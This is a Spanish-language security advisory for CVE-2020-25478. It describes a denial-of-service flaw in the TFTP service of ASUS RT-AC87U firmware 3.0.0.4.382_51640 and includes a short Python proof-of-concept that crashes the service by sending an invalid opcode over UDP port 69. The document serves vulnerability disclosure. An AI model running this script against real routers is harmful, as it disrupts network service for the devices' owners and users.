
ASUS RT-AC87U TFTP es vulnerable a ataques de Denegación de Servicio (DoS)
CVE-2020-25478 - El servicio TFTP de ASUS RT-AC87U es vulnerable a un ataque de Denegación de Servicio (DoS)
ASUS RT-AC87U 3.0.0.4.382_51640
Se relaciona principalmente con CWE-20; el servicio TFTP que se ejecuta en ASUS RT-AC87U es vulnerable a un ataque de Denegación de Servicio (DoS) cuando se envía un código de operación (opcode) no válido al servicio. El siguiente fragmento de código Python se utiliza para probar la vulnerabilidad:
import socket
import sys
tftpd = ('192.168.1.1', 69)
#Try and open an UDP SOCKET
try:
tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print("Failed on socket creation, so exiting")
sys.exit(1)
#create a invalid opcode exeeding the 2 byte length
# opcode operation
# 1 Read request (RRQ)
# 2 Write request (WRQ)
# 3 Data (DATA)
# 4 Acknowledgment (ACK)
# 5 Error (ERROR)
invalidOpcode = "0000"
tftp.sendto(invalidOpcode,tftpd)
3. DESCRIPCIÓN
La versión 3.0.0.4.382_51640 del Asus RT-AC87U es vulnerable a un ataque de denegación de servicio en el servicio TFTP, lo que provoca que el servicio TFTP se bloquee. El servicio TFTP es propenso a bloquearse de forma remota mediante el envío de un código de operación (opcode) no válido.
https://www.asus.com/content/ASUS-Product-Security-Advisory/